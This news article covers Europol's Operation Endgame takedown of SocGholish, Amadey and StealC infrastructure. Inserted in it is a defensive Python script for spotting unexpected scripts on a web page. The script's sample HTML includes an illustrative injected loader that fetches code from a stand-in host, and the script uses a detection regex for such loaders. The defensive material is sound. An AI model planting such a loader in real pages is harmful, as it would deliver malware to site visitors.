- EUROPOL’s Operation Endgame Freezes $47M in Cryptocurrency and Dismantles Infrastructure for SocGholish, Amadey and StealC Malware
- 326 servers, 142 domains and 14,971 infected websites were taken down, disrupting distribution networks and recovering 27 million credentials
- No arrests were made; experts warn that such disruptions often only temporarily halt criminal operations until infrastructure is rebuilt
Millions of dollars in cryptocurrency were frozen and hundreds of servers taken down in a sweeping operation by EUROPOL and several national law enforcement agencies against cybercriminals.
Over the past few weeks, EUROPOL ran Operation Endgame together with law enforcement agencies from Canada, Denmark, Germany, the Netherlands, the United Kingdom and the United States. Several private companies, including Microsoft, also participated.
The goal was the dismantling of the digital infrastructure used by three different malware operations: SocGholish, Amadey and StealC. These are well-known malware families that give attackers backdoor access to compromised devices and steal credentials and other valuable secrets from them.
Shutdown of servers and cleaning of websites
SocGholish, for example, is a sophisticated JavaScript downloader and loader linked to a Russian Malware-as-a-Service (MaaS) operation called Evil Corp.
During the operation, the police managed to identify and freeze 47 million dollars in cryptocurrency. Law enforcement cannot access or retrieve these funds, but by freezing them it has effectively removed them from circulation. About 27 million login credentials were also recovered as part of this operation.
In addition, law enforcement shut down 326 servers and 142 domains used to host and distribute the malware. This, EUROPOL says, “severely hampered” the malware’s distribution network: “By simultaneously removing these tools, cooperation between law enforcement and private parties has increased friction for cybercriminals, making it harder for attacks to succeed, spread or recover.”
EUROPOL also said that by removing SocGholish, 14,971 infected websites were “fixed”. These are legitimate websites belonging to various businesses such as restaurants, auto repair shops and others, but were compromised and used as entry points for the delivery of malware.
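The article does not show what the injected code on those compromised sites looks like, so the following is an added example, not code from TechRadar, Europol or any of the named vendors. It is a small Python triage script a site owner could run over a saved copy of one of their own pages: it lists script sources that are neither first-party nor on an allowlist of expected hosts, hashes inline scripts so they can be compared against a known-good baseline, and flags inline scripts that themselves create further script elements (a generic loader pattern used here only as a review heuristic, not as a SocGholish signature). The hostnames and HTML below are constructed for illustration.

```python
"""Triage check for unexpected scripts on a web page (added example).

Assumes the site owner has a saved copy of a page and an allowlist of the
hosts they expect to serve scripts; everything else is surfaced for review.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic: inline code that creates a <script> element at runtime.
_LOADER_PATTERN = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.IGNORECASE)


class _ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies in page order."""

    def __init__(self):
        super().__init__()
        self.external = []     # values of src attributes
        self.inline = []       # bodies of inline <script> blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def find_unexpected_scripts(html, allowed_hosts, page_host):
    """Return a dict describing scripts that deserve a closer look.

    unexpected_external: script URLs whose host is neither page_host nor in
        allowed_hosts (relative URLs are treated as first-party).
    inline_digests: sha256 of each inline script body, for baseline comparison.
    loader_like_inline: indices into inline_digests of inline scripts that
        create another script element at runtime (heuristic only).
    """
    collector = _ScriptCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts} | {page_host.lower()}

    unexpected = []
    for src in collector.external:
        host = urlparse(src).hostname   # handles https://, //host/, and relative
        if host is None:
            continue                    # relative URL: served by the site itself
        if host.lower() not in allowed:
            unexpected.append(src)

    digests = [hashlib.sha256(body.encode()).hexdigest() for body in collector.inline]
    loader_like = [i for i, body in enumerate(collector.inline) if _LOADER_PATTERN.search(body)]
    return {
        "unexpected_external": unexpected,
        "inline_digests": digests,
        "loader_like_inline": loader_like,
    }


# Constructed sample page: one first-party script, one allowed CDN, one benign
# inline config block, one protocol-relative script from an unknown host, and
# one inline block that injects a further script at runtime.
SAMPLE_HTML = """<html><head>
<script src="/assets/app.js"></script>
<script src="https://cdn.trusted-vendor.example/ui.js"></script>
<script>window.cfg = {theme: "dark"};</script>
<script src="//static.unknown-host.example/loader.js"></script>
<script>
var s = document.createElement('script');
s.src = 'https://static.unknown-host.example/update.js';
document.head.appendChild(s);
</script>
</head><body>Menu</body></html>"""

if __name__ == "__main__":
    report = find_unexpected_scripts(SAMPLE_HTML, ["cdn.trusted-vendor.example"], "www.shop.example")
    for key, value in report.items():
        print(f"{key}: {value}")
```

The allowlist approach deliberately flags anything it does not recognise rather than matching known-bad indicators: a site owner knows which hosts their pages should load from, and a newly appearing third-party or protocol-relative script source is worth a manual look regardless of which campaign put it there. Comparing the inline digests against a baseline taken from a clean deployment catches modifications to existing inline code that a host allowlist alone would miss.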
Unfortunately, no arrests have been made, and EUROPOL did not say whether key players in these groups were identified at all. Disruptions like this usually only halt malicious activity temporarily; it tends to resume within a few weeks once the infrastructure has been rebuilt.
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews and opinions in your feeds.